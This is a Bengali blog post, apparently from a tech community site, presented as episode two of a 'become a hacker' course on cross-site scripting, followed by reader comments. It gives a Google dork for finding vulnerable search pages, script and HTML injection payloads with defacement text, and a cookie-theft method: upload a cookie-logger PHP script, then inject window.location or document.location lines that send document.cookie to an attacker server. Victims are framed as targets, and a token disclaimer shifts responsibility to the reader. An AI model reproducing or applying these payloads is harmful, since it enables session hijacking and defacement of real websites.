হ্যাকিং!! হ্যাকিং শিখে হয়ে যান হ্যাকার পর্বঃ-০২

সাগ্বতম! আপনাকে হ্যাকিং শিক্ষা কোর্স দ্বিতীয় পর্বে

আজকের পর্বের বিষয়ঃ- 

XSS

নোটীশঃ- প্রতিটি লিখা বা পর্ব আনলাইন এর আনাচে কানাচে থেকে সংগ্রহ করা হবে এবং নিচে লেখক এর ক্রেডিট দেওায়া হবে। কখন ও ইংলিশ ব্লগ থেকে কপি করে ট্রাস্লেট করা হবে। ফলে বুজে নিতে হবে  😛 এবং কিছু কিছু লিখালেখক  এর নিজের থাকবে এবং একান্ত নিজের মতামত ! তাই আপনার সাথে না ও মিলতে পারে।

প্রথম পর্ব যারা দেখেন নি দেখে আসুনঃ-

হ্যাকিং!! হ্যাকিং শিখে হয়ে যান হ্যাকার পর্বঃ-০১

XSS কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড।  সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি।  😈

XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়।

XSS Vulnerabilities খুঁজে বের করাঃ-একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি carking  করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।

inurl:"search.php?q=" তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন।  😯

XSS প্রাথমিক আলোচনাঃ-  XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে।

চিত্রঃ XSS

Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল <script>alert("XSS")</script>

আপনি ভিকটিমের সাইটটি যদি vulnerable  হল, তাহলে এই কোডটি দেয়ার পর একটি পপ-আপ মেনু আসবে। যদি কাজ হয়ে যায়, তাহলে আপনি আরও যুক্ত করতে পারবেন। <script>alert("site.com hakced by ভুত বাবা")</script>
প্রথমে বলেছিলাম যে, crack  করতে না পারলে গুগল ডক ব্যবহার করার জন্য। তাই আমরা নিচের ডকটি ব্যবহার করব ভ্যালু বের করার জন্য। search.php?q= যদি আপনি কোন সাইট পান ভ্যালুএবল, তাহলে নিচের কোডটি প্রবেশ করান। ধরি, আপনি http://www.site.com এটির vulnerable পেয়েছেন। তাহলে টাইপ করুন www.site.com/search.php?q=<script>alert("site.com hakced by ভুত বাবা")</script> তাহলে  একটি পপ-আপ মেনু আসবে।    👿
যদি এটা কাজ না করে? injecting HTMl দিতে চেষ্টা করতে পারেন।  😉 তাহলে নিচের HTML কোডটি প্রবেশ করান। <h1>anything you want</h1> <br><br><b><u>any thing you want</u></b> তাহলে আমার লিংক হবেwww.site.com/search.php?q= <h1>site.com hakced by ভুত বাবা</h1>www.site.com/search.php?q=<br><br><b><u>site.com hakced by ভুত বাবা</u></b>
এক্ষেত্রে আপনি আপনি যদি এখানে Bold লেখা দেখেন,তাহলে বুঝবেন এটা ভ্যালুয়েবল।  😆

ভিকটিম মারা পদ্ধতিঃ-

এতক্ষন দেখলাম  XSS এর কাজ করার পদ্ধতি। এখন এর  কয়েকটি জনপ্রিয় ম্যাথড দেখব ! 😛 

<html><body><IMG SRC="http://site.com/hacked.cyberking"></body></html> এছাড়াও আপনি আরেকটি কাজ করতে পারবেন IMG SCR এটা হল তাদের জন্য যারা HTML জানেন না তাদের জন্য। IMG SCR হল একটি ট্যাগ, এখানে দেয়া ছবিটি লিংক ওয়েবপেজে দেখাবে। এখন আমরা Shoutbox, Comment box বা যে কোন কিছু খুঁজে পেলাম। যা আপনার সাবমিট করাডাটাটি ওয়েবপেইজে দেখাবে। তবে এটা করলে আপনার ওয়েবপেজে শুধু মাত্র ছবির লিংকটি দেখাবে। <IMG SRC=""http://site.com/vuthBaba.png">তবে এটা করলে আপনার দেয়া ছবিটি ওয়েবপেজে বড় দেখাবে। এছাড়া আরেকটি ম্যাথড হল FLASH ভিডিও। <EMBED SRC="http://site.com/TJUnselected.swf"এবার একটি পপ-আপ দিন <script>window.open("http://www.site")</script>।

Cookie চুরি করার পদ্ধতিঃ-

প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন।। নোটঃ chmod  হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন। window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

অথবা

 document.location = "http://yourServer.com/cookielogger.php?c="+document.cookieএবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.phpc=”+document.cookie  👿

আরো কিছু থাকলে মন্তভ্য এর মাধ্যমে জানবেন ক্রেডিট  ➡  Click Here  💡 

একটা কথাঃ- You Can Fool some of the people all the time, All the people some of the time, but you can not fool all the people All the time!  @Rizwan BIn Sulaiman 

উপদেশঃ-  হ্যাকিং জানার জন্য শিখে রাখুন। কার ক্ষতি করার জন্য নয়। হ্যা কোথায় কিছু অন্যায় ভাবে করলে সমস্যা হলে লেখক দায়ী নয়। নিজ দ্বায়িতে করুন। 👿

যোগাযোগ করুনঃ-  ভুত বাবা   (রিকুয়েস্ট দিলে মেসেজ দিবেন নাইলে এক্সপেট হবার ভরসা নাই)

 অপেক্ষা করুন ৩য় পর্ব পর্যন্ত   ➡

Level 0

আমি আমি একজন ভাল ছেলে। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 18 টি টিউন ও 30 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

কিছু নাই


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

Level 0

Thank’s vai. vai tune ear sathe bangla video dele r o valo hobe.pls.pls.pls . r k o na hole o apna tune thake ami 1 jon siktece.

শেয়ার করার জন্য ধন্যবাদ ।

Vaiya apnar tune gulo khub valo hoiteche.Kintu sobcheye valo hoto jodi apni video tutorial diten.
karon ete amader practically sikha hoto.ebong amra khub sohojey hacking sikhte parbo.
Thanks For Your Nice Tune.
Chaliye jan

777 a CHMOD kora bolte ki bujhbo